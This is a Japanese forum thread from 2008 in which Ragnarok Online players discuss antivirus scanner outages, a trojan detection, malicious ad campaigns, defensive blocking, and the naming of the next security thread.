932 ：（○口○*）さん sage ： 2008/06/11(水) 04:15 ID:kZRfeYha0

ほんとだ
アンインスコしてもだめだな
XPSP2 NIS2008

933 ：（○口○*）さん sage ： 2008/06/11(水) 04:28 ID:kZRfeYha0

追記

本家サイトのフリースキャンはいけた。だいぶスキャン画面綺麗になってるな、関係あるかもしれない
ttp://www.kaspersky.com/virusscanner

934 ：（○口○*）さん sage ： 2008/06/11(水) 05:46 ID:yjP0bwaX0

同じくだめだったXPSP3 KIS7.0

あとエラー出たあとに再起動してらKIS7.0の定義ファイル自体が壊れた
もう1回同じ手順やっても再現しなかったからそれが原因とも限らないし
KIS入れてるのにカスペのオンラインスキャナかける人もあまりいないと思うが
一応報告しとく

935 ：（○口○*）さん sage ： 2008/06/11(水) 05:51 ID:/NG1YFF60

>>930
とりあえずPCのクリーンインストールをオススメしておく

936 ：（○口○*）さん sage ： 2008/06/11(水) 07:24 ID:RJttd7m80

WindowsUpdate来てるぞー

937 ：（○口○*）さん sage ： 2008/06/11(水) 07:34 ID:AAskYY/30

またこりゃ一杯きたな

938 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/06/11(水) 07:53 ID:megR7Rr+0

最近、リストに抜けがないか心配だったりします。

元々人様のリストから取ってきて目視手動でやりくりしているので
最近インジェクションの荒波以降は確認する作業で
少々日常に泣きが入ってきている状況だったりします。
罠を自動取得更新するような物があるといいのですけど
単体PCで常時点けっぱなしとか出来ない環境なのでそういうわけにも行かず。

なので、もしリストに抜けあった場合は
このスレやら拍手返事ボタンに突っ込みをしていただけると助かります。

939 ：（○口○*）さん ： 2008/06/11(水) 08:21 ID:5yZ5KywV0

緊急(3) 重要(3) 警告(1)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-jun.mspx

先月分が、OSでは無くOfficeアプリなどに偏っていた反動か、今回はWindows本体絡みが多いか。

940 ：930 sage ： 2008/06/11(水) 08:30 ID:kAdUwrwWO

>>935
やはりそれが１番ですか、ありがとうございます

携帯から失礼しました

941 ：（○口○*）さん sage ： 2008/06/11(水) 15:43 ID:RWNn7s/t0

先ほどantivirでスキャンしたら

TR/Drop.Agent.sit　というファイルが2つ検出された、ここ数日RO関係のサイトくらいしか
いってないから感染したのはそれ系だと思うんだけど
どんなウィルスか調べるにも情報がないのですが･･･どなたかわかりませんか？

942 ：（○口○*）さん sage ： 2008/06/11(水) 15:49 ID:OC+FhZOa0

これの亜種なら、マルウェアをローカルに生成するTrojanのようだが。
http://www.avira.de/jp/threats/section/fulldetails/id_vir/4184/tr_drop.agent.95744.html

943 ：（○口○*）さん sage ： 2008/06/11(水) 16:06 ID:RJttd7m80

>>941
そのファイルをVirusTotalあたりに投げて
各社の検出名でググればいいんじゃね?

944 ：（○口○*）さん sage ： 2008/06/11(水) 16:13 ID:NbX4jRLsO

やはりカスペオンラインスキャン出来ない仲間がいて少し安心した

このスレ見る前だったからいきなり昨日出来たオンラインスキャンが
今日から出来なくなりファビョってカスペに電話したら
分かりません的な回答されて悩んでたよ

945 ：（○口○*）さん sage ： 2008/06/11(水) 16:28 ID:RJttd7m80

>>944
メンテ中なのか攻撃受けてるのか知らんけどcom側に繋がらんね
(オンラインスキャナはco.jpもruもcomに飛ぶ)。
ruのファイルスキャナは使える。

946 ：（○口○*）さん sage ： 2008/06/11(水) 16:59 ID:wtwZIUK+0

927だけど別ＰＣでも無理だったわ。カスペ側の問題みたいね

947 ：（○口○*）さん sage ： 2008/06/12(木) 05:03 ID:mGiKkQ0q0

俺も同じ状況だ。

948 ：（○口○*）さん sage ： 2008/06/12(木) 05:42 ID:5PIXLTBI0

2008年の国別ドメイン危険度ランキング、香港「.hk」と中国「.cn」が急上昇

ttp://www.computerworld.jp/topics/vs/110809.html

中華ががんばっているようです

949 ：（○口○*）さん sage ： 2008/06/12(木) 07:03 ID:apWT7wqn0

>>859

950 ：（○口○*）さん sage ： 2008/06/12(木) 18:50 ID:apWT7wqn0

Opera9.5
ttp://jp.opera.com/

951 ：（○口○*）さん sage ： 2008/06/12(木) 19:09 ID:YHL2geRjO

今回の広告に埋め込まれるパターン増えたら、もう対策厳しいだろうなぁ
怪しいＵＲＬをクリックしないっていう前提を無視だもんな

952 ：（○口○*）さん sage ： 2008/06/12(木) 19:13 ID:tMkCjLRV0

ダウンローダをブロックできなくても（フラッシュプレイヤーを最新にしてれば阻止できる筈だが）
本体をセキュリティソフトでブロックできれば無事だよ。

953 ：（○口○*）さん sage ： 2008/06/12(木) 19:17 ID:LrcwmID50

今は、ね
新しい手口でそれされたら、わからないうちは危険大って事だし

954 ：（○口○*）さん sage ： 2008/06/12(木) 19:24 ID:N3IFmlOs0

Webブラウズ時の脅威がほとんどだから、面倒でも別の独立した環境を
使う方が安全。あとは仮想化だとかねぇ。

955 ：（○口○*）さん sage ： 2008/06/12(木) 19:47 ID:EIzRCrBn0

Flashの誤報のニュースの時に更新した人も多いだろうし、結果的に
タイミングがよかったとしか。

しかしxreaの件が０Dayだったと考えると、対策としては
・（犯人が中華と仮定して）PG2で国別でブロック
・（通信先が既知のドメインと仮定して）hosts変更

抜本的な対策としては
・捨て環境（仮想PCや非Win環境）を用意して常に運用しかない
だろうなぁ。。。
VMWare＋Ubuntuとか、タダで簡単に用意できる時代になったとは
いえ、まだまだ一般的とは言えないし。

956 ：（○口○*）さん sage ： 2008/06/12(木) 19:53 ID:EIzRCrBn0

ところで950超えたが、次スレどうする？
まだ決まってないようだが。

１）次スレは統合スレとしてLiveRo、ハクスレが埋まったら吸収
　　RO板への移住の話は新スレで決める
２）セキュスレの次スレはなしで埋まったらハクスレに移動
　　今後はハクスレ埋まれば新スレは統合スレ

現実的には、このどちらかになると思うんだが。

957 ：（○口○*）さん sage ： 2008/06/12(木) 20:47 ID:Q/G7TL3n0

向こうに合流でいいんじゃないかな。当時の分割理由の意義が多少薄れている事もある現状、
その辺のあり方で無駄にスレを消費するよりは好ましいかと。
こちらよりはあちらなのは、まとめさんや幾らかのWikiでここのログが保管されているとはいえ、
やはりログが消えないあちらは魅力だと思う。

しかし今回の騒ぎで雷鳥Wikiさんとかが無料から有料に移行したりしてる。色々と心苦しいご時世だあねぇ。

958 ：（○口○*）さん sage ： 2008/06/12(木) 21:58 ID:tMkCjLRV0

一般のセキュリティ系雑談も扱う訳だし、現状のテンプレのRO板には合流できないよ。
きちんと結論が出るまでは現状維持するしかないでしょ。

LiveROに次のセキュスレ立てて、そこで使い分けとテンプレの相談すればいいよ。

959 ：（○口○*）さん sage ： 2008/06/12(木) 22:16 ID:apWT7wqn0

同じことを数スレ前から繰り返している気がする

960 ：（○口○*）さん sage ： 2008/06/12(木) 22:18 ID:0gnmUtl/0

そろそろ変えないと向こうのグダグダを繰り返すだけになるな

961 ：（○口○*）さん sage ： 2008/06/12(木) 22:21 ID:2gWnWTkI0

LiveRO側に統合（一括して扱う）って意見が多数、
というか明確な反論がなかった気がする。

962 ：（○口○*）さん sage ： 2008/06/12(木) 23:00 ID:IvvF0UH/0

>>921の
>まずはLiveRoで統合、それから必要ならRO板に移転、の流れ
>(つまり>>919B案改や>906案)にした方がいいと思う。
で決定でしょ？
垢ハクスレの次スレはなし、このスレに統一した上で
ここの次スレで改めて身の振り方を考える、と
向こうも900近いし、早晩統一できると思う

963 ：（○口○*）さん sage ： 2008/06/13(金) 01:41 ID:jDXmHTmS0

スレイプニルでセキュアモード（ActiveX、Java、JavaScript、音楽、ビデオ再生を不許可）
にした場合は、FLASH無効と似たような効果があると見ていいんでしょうか？

964 ：（○口○*）さん sage ： 2008/06/13(金) 04:06 ID:t2wIIccJ0

YouTubeのてきとーな動画踏めばわかるんじゃね?

965 ：（○口○*）さん sage ： 2008/06/13(金) 09:22 ID:pO3VN8Ed0

一応住み分けしている（ログが流れないように分けてある）んだから、
現状維持で、方針の修正をすればいいよ。

966 ：（○口○*）さん sage ： 2008/06/13(金) 09:46 ID:DJIk+dxG0

住み分けすら出来てないだろ
話題的にセキュスレが包括するのは当然にせよ、結局は両方でネタ分散

で、ガチガチに固めるとコピペ厨が次スレでも暴れまくるのが目に見えてる

まずはLiveRoで統合、RO板に移るかは新スレで相談、でいい

967 ：（○口○*）さん sage ： 2008/06/13(金) 10:49 ID:dkEK4u4O0

だなぁ

968 ：（○口○*）さん sage ： 2008/06/13(金) 11:11 ID:AWytohlw0

分散してるとコピペ厨じゃなくとも、何だかんだで誘導レス出てノイズ増える。
回答する時もわざわざ移動したりで、二度手間になるだけだし。

ところで今ちょっとセキュWiki見てテンプレ見直してるんだが、スレタイどうする？
・アカウントハック対策
・セキュリティ
この２言は入れた方がいいと思うんだが、こんな感じかね？

アカウントハック対策セキュリティ総合スレ

スレタイ文字数とレス行数、連続レス投稿数はどこで見るんだっけ？
これらが長いとスレ立て時が大変だし。

969 ：（○口○*）さん sage ： 2008/06/13(金) 11:13 ID:vb0hEhQR0

アカウントハック・セキュリティ総合対策スレ

って感じのがいいかもしれない。

970 ：（○口○*）さん sage ： 2008/06/13(金) 11:59 ID:6b950/qt0

アカウントハック対策はセキュリティに含まれるような気が
セキュリティ対策スレとかセキュリティ向上スレとかでも分かるでしょ

971 ：（○口○*）さん sage ： 2008/06/13(金) 13:03 ID:m+Jjrvck0

>969でいいんじゃない？

スレは駆け込み寺の性格があるから、アカウントハックの文字は
入れておいた方がいいだろうし。
セキュリティの文字は、全般も扱うという意味を示すし。

972 ：（○口○*）さん sage ： 2008/06/13(金) 13:07 ID:vFRFv9O90

”総合”って必要？
アカウントハック・セキュリティ対策スレでいいと思う。

973 ：（○口○*）さん sage ： 2008/06/13(金) 13:31 ID:jJMZ8YEr0

「ハッカー攻撃の技術ない」米議員の被害指摘に中国
http://sankei.jp.msn.com/world/china/080613/chn0806130037001-n1.htm

974 ：（○口○*）さん sage ： 2008/06/13(金) 13:32 ID:7StziKe/0

もういっそ「対策」も「スレ」も省いてしまうとか。
でもエラースレなんかではたまに2chと間違えて来る人が居るから

ROアカウントハック・セキュリティ

975 ：（○口○*）さん sage ： 2008/06/13(金) 13:41 ID:dkEK4u4O0

アカウントハックと書くなら、その続きに対策の文字は欲しいが。。。

976 ：（○口○*）さん sage ： 2008/06/13(金) 16:22 ID:6b950/qt0

ROアカウントハック対策・セキュリティ
か
セキュリティ・ROアカウントハック対策
あたり？
スレの文字は欲しいなあ、気にしなくてもいい範囲なんだが、ないとなんかネタっぽくて…

んでそろそろテンプレ案貼ってﾎｼｽ

977 ：（○口○*）さん sage ： 2008/06/13(金) 17:02 ID:7StziKe/0

>>976
ごめん遊びすぎた、>>974は半分冗談だからあんまり気にしないでｗ
本気なのは「RO」ってつけたほうがいいところと、
「対策」つけるなら>>976のように「アカウントハック」にちゃんと
くっつけるか、さもなければいらないってこと。

「対策」を必要とするのは「アカウントハックを冗長させるスレではない」
という主張なんだろうから、たとえば>>972案は
「アカウントハックするためにセキュリティ突破の策を考えるスレ」と
ひねくれた解釈ができてしまう。それじゃ片手落ちなんだ。

978 ：（○口○*）さん sage ： 2008/06/13(金) 18:33 ID:nVaLOcak0

アカウントハック 対策・質問・雑談スレ でどうかな。長過ぎるけど。

分離しっぱなしでもいいと思うんだけどなぁ。両方巡回するのは手間じゃないし、アカハックの話題が進行中に
セキュリティ関係のニュース貼るのは憚られるから、セキュスレのような自由度の高いスレは、駆け込み寺とは
別にあってもいいと思うんだ。

979 ：（○口○*）さん sage ： 2008/06/13(金) 19:07 ID:1JVxsPFE0

統合して無理がありそうならまた分離すりゃいいんじゃないかね。
結局は>>966-968だし。
しっかりアンカーつけてレスしてりゃふたつみっつ同時に話が進行してても別に問題ない。

980 ：（○口○*）さん sage ： 2008/06/13(金) 20:17 ID:MkHxL8dq0

テンプレ案、セキュWikiで考えてるけど、どうにも削りにくい

書きかけのテンプレ案
ttp://rosafe.rowiki.jp/index.php?%A5%A2%A5%AB%A5%A6%A5%F3%A5%C8%A5%CF%A5%C3%A5%AF%C2%D0%BA%F6%A1%A6%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3%BB%A8%C3%CC%A5%B9%A5%EC%A5%C6%A5%F3%A5%D7%A5%EC%B0%C6

LiveRoの設定が http://enif.mmobbs.com/livero/SETTING.TXT こうなってるので
4レス以内にしたいんだが、レス4,5が削りにくい。

981 ：（○口○*）さん sage ： 2008/06/13(金) 21:10 ID:nVaLOcak0

>>980
スレ立ての人がテンプレ貼りおわるまで自粛したり、テストスレを利用して再投稿可能になる時間を縮める支援するとか。

982 ：（○口○*）さん sage ： 2008/06/13(金) 21:24 ID:t2wIIccJ0

セキュリティホールmemoやリネージュ資料室で
xreaのウイルス広告について出ているので、常連さんは一読を。

983 ：（○口○*）さん sage ： 2008/06/13(金) 21:40 ID:exk73nNb0

どっちかっていうと、何も知らない人に読んでもらいたいんだけれどね。。。

984 ：（○口○*）さん sage ： 2008/06/13(金) 21:56 ID:t2wIIccJ0

まーそうなんだけど、物質スレとかあちこちに貼ったりするのもなんかなーと。

985 ：（○口○*）さん sage ： 2008/06/13(金) 21:57 ID:f9h2Tssa0

新スレテンプレ、>980のでいいんじゃね？

不備あれば後々追加すればいい。
スレの過去ログ部分をどうするか、って問題はあるが、Wikiに添付すれば
済むだろうし、駄目ならまとめ臨時氏の方に誘導張るって手もあるだろうし。

スレタイは案にあるように　アカウントハック対策・セキュリティ総合スレ　で
いいのかな？
スレ�ｂﾍ１から？とコメントされてるが。

問題無いならそろそろ建てた方がいいかも。。

986 ：（○口○*）さん sage ： 2008/06/13(金) 22:05 ID:R8rXd+Au0

アカウントハック対策もセキュリティ関係の一部分にすぎないのじゃないかね
ROセキュリティ対策総合スレ、でいいんじゃないの

987 ：（○口○*）さん sage ： 2008/06/13(金) 22:08 ID:Tm5cXD9m0

ハックでスレタイ検索してヒットしないのはまずくね？

988 ：（○口○*）さん sage ： 2008/06/13(金) 22:23 ID:hCVMN6tV0

スレタイにこだわる必要もないだろうし、>980案で建ててきた

アカウントハック対策・セキュリティ 総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

5スレ使っても建てれたので、長さ的にも問題なかった

989 ：（○口○*）さん sage ： 2008/06/13(金) 22:25 ID:nVaLOcak0

乙っす

990 ：（○口○*）さん sage ： 2008/06/13(金) 22:44 ID:MkHxL8dq0

>988、乙でした。
あとテンプレ整理手伝ってくれた人もありがとうでした。

991 ：（○口○*）さん sage ： 2008/06/14(土) 23:08 ID:L2SGiJna0

埋めがてら

hostsに記載してる各ホスト名からIPを引いて、PG2用のリストを
作ろうとスクリプトを書いて実行したら、nslookupに1時間前後
かかった罠。

さらに、ものの試しにそれを逆引きしてみたら

gg■haoliuliang■com　（まとめ臨時氏のサイトに掲載アド）
↓
222■3■4■11
↓
ZH004011■ppp■dion■ne■jp

うーん……

992 ：（○口○*）さん sage ： 2008/06/14(土) 23:31 ID:F89IxDKT0

つまり、ionユーザーがDDNSサービス使って罠サイトを作ってた、と
考えられる……のか？

それ国内IPだし、PG2使いでも抜けられる可能性が高いような。
DDNSだとIPコロコロ変わる可能性あるし、厄介だな……

993 ：（○口○*）さん sage ： 2008/06/14(土) 23:32 ID:F89IxDKT0

ionじゃない、dionだ

994 ：（○口○*）さん sage ： 2008/06/14(土) 23:33 ID:j+s8LP8L0

何を言ってるのかさっぱりだぜ！

995 ：（○口○*）さん sage ： 2008/06/14(土) 23:38 ID:dw/ninam0

発信元が国内ってもゾンビPCかもしれないが、ODNの件もあるし。。。

996 ：（○口○*）さん sage ： 2008/06/14(土) 23:49 ID:F89IxDKT0

odnのはまだ罠アドレスを書きまくるだけだが、こっちは罠サイトの
実体がdionにあった、って事だろ？
odnの奴よりタチ悪いというか、PG2のみのブロックだと確実に
踏む気がする。

>994
罠アドレスとして報告されてるものが、実はdionのIPだった、という事。
罠設置を考えるとゾンビPCの可能性より、国内の協力者という線が
強い気がする。

997 ：（○口○*）さん sage ： 2008/06/14(土) 23:59 ID:uDzp6GAb0

ODNは、いま契約すれば○ヶ月無料！みたいなのを次々と乗り継いでる
とかなんだろーか？で、クライアントとして各方面投稿はできるけど
サーバにはなれない。

つか、国内なら普通に警察を動かせるんじゃないの。

998 ：（○口○*）さん sage ： 2008/06/15(日) 00:21 ID:IxYS6xjI0

無料のDDNSサービス使えば、鯖として運用可能だからなあ
次々乗り継いだとしても、自分のIP送れば設定完了だし

odnのアレも自ドメイン取って運用とかしてくるのかねぇ？

999 ：（○口○*）さん sage ： 2008/06/15(日) 00:22 ID:IxYS6xjI0

さて、埋まるし次スレ誘導

アカウントハック対策・セキュリティ 総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

1000 ：（○口○*）さん sage ： 2008/06/15(日) 00:25 ID:IMkV7jgw0

ok、移動しようか。

アカウントハック対策・セキュリティ 総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

1001 ：１００１ ： Over 1000 Thread

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。